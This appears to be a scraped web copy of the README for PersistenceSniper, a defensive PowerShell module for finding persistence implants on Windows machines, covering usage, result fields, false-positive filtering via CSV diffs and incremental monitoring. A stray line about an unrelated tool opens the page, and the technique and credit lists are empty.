Currently, Pinecone reconnaissance SQLite database is stored in the db/ directory inside the project root folder. All the temporary files that Pinecone needs to use are stored in the tmp/ directory also under the project root folder.



PersistenceSniper - Powershell Script That Can Be Used By Blue Teams, Incident Responders And System Administrators To Hunt Persistences Implanted In Windows Machines


PersistenceSniper is a Powershell script that can be used by Blue Teams, Incident Responders and System Administrators to hunt persistences implanted in Windows machines. The script is also available on Powershell Gallery.


The Why

Why writing such a tool, you might ask. Well, for starters, I tried looking around and I did not find a tool which suited my particular use case, which was looking for known persistence techniques, automatically, across multiple machines, while also being able to quickly and easily parse and compare results. Sure, Sysinternals' Autoruns is an amazing tool and it's definitely worth using, but, given it outputs results in non-standard formats and can't be run remotely unless you do some shenanigans with its command line equivalent, I did not find it a good fit for me. Plus, some of the techniques I implemented so far in PersistenceSniper have not been implemented into Autoruns yet, as far as I know. Anyway, if what you need is an easy to use, GUI based tool with lots of already implemented features, Autoruns is the way to go, otherwise let PersistenceSniper have a shot, it won't miss it :)

Usage

Using PersistenceSniper is as simple as:

PS C:\> git clone https://github.com/last-byte/PersistenceSniper
PS C:\> Import-Module .\PersistenceSniper\PersistenceSniper\PersistenceSniper.psd1
PS C:\> Find-AllPersistence

If you need a detailed explanation of how to use the tool or which parameters are available and how they work, PersistenceSniper's Find-AllPersistence supports Powershell's help features, so you can get detailed, updated help by using the following command after importing the module:

Get-Help -Name Find-AllPersistence -Full

PersistenceSniper's Find-AllPersistence returns an array of objects of type PSCustomObject with the following properties:

This allows for easy output formatting and filtering. Let's say you only want to see the persistences that will allow the attacker to regain access as NT AUTHORITY\SYSTEM (aka System):
PS C:\> Find-AllPersistence | Where-Object "Access Gained" -EQ "System"


Of course, being PersistenceSniper a Powershell-based tool, some cool tricks can be performed, like passing its output to Out-GridView in order to have a GUI-based table to interact with.


Interpreting results

As already introduced, Find-AllPersistence outputs an array of Powershell Custom Objects. Each object has the following properties, which can be used to filter, sort and better understand the different techniques the function looks for:

  • ComputerName: this is fairly straightforward. If you run Find-AllPersistence without a -ComputerName parameter, PersistenceSniper will run only on the local machine. Otherwise it will run on the remote computer(s) you specify;
  • Technique: this is the name of the technique itself, as it's commonly known in the community;
  • Classification: this property can be used to quickly identify techniques based on their MITRE ATT&CK technique and subtechnique number. For those techniques which don't have a MITRE ATT&CK classification, other classifications are used, the most common being Hexacorn's one since a lot of techniques were discovered by him. When a technique's source cannot be reliably identified, the "Uncatalogued Technique N.#" classification is used;
  • Path: this is the path, on the filesystem or in the registry, at which the technique has been implanted;
  • Value: this is the value of the registry property the techniques uses, or the name of the executable/library used, in case it's a technique which relies on planting something on the filesystem;
  • Access Gained: this is the kind of access the technique grants the attacker. If it's a Run key under HKCU for example, the access gained will be at a user level, while if it's under HKLM it will be at system level;
  • Note: this is a quick explanation of the technique, so that its workings can be easily grasped;
  • Reference: this is a link to a more in-depth explanation of the technique, should the analyst need to study it more.

Dealing with false positives

Let's face it, hunting for persistence techniques also comes with having to deal with a lot of false positives. This happens because, while some techniques are almost never legimately used, many indeed are by legit software which needs to autorun on system boot or user login.

This poses a challenge, which in many environments can be tackled by creating a CSV file containing known false positives. If your organization deploys systems using something like a golden image, you can run PersistenceSniper on a system you just created, get a CSV of the results and use it to filter out results on other machines. This approach comes with the following benefits:

  • Not having to manage a whitelist of persistences which can be tedious and error-prone;
  • Tailoring the false positives to the organizations, and their organizational units, which use the tool;
  • Making it harder for attackers who want to blend in false positives by not publicly disclosing them in the tool's code.

Find-AllPersistence comes with parameters allowing direct output of the findings to a CSV file, while also being able to take a CSV file as input and diffing the results.

PS C:\> Find-AllPersistence -DiffCSV false_positives.csv

ย 

Looking for persistences by taking incremental snapshots

One cool way to use PersistenceSniper my mate Riccardo suggested is to use it in an incremental way: you could setup a Scheduled Task which runs every X hours, takes in the output of the previous iteration through the -DiffCSV parameter and outputs the results to a new CSV. By keeping track of the incremental changes, you should be able to spot within a reasonably small time frame new persistences implanted on the machine you are monitoring.

Persistence techniques implemented so far

The topic of persistence, especially on Windows machines, is one of those which see new discoveries basically every other week. Given the sheer amount of persistence techniques found so far by researchers, I am still in the process of implementing them. So far the following 31 techniques have been implemented successfully:

Credits

The techniques implemented in this script have already been published by skilled researchers around the globe, so it's right to give credit where credit's due. This project wouldn't be around if it weren't for:

I'd also like to give credits to my fellow mates at @APTortellini, in particular Riccardo Ancarani, for the flood of ideas that helped it grow from a puny text-oriented script to a full-fledged Powershell tool.

License

This project is under the CC0 1.0 Universal license. TL;DR: you can copy, modify, distribute and perform the work, even for commercial purposes, all without asking permission.



โŒ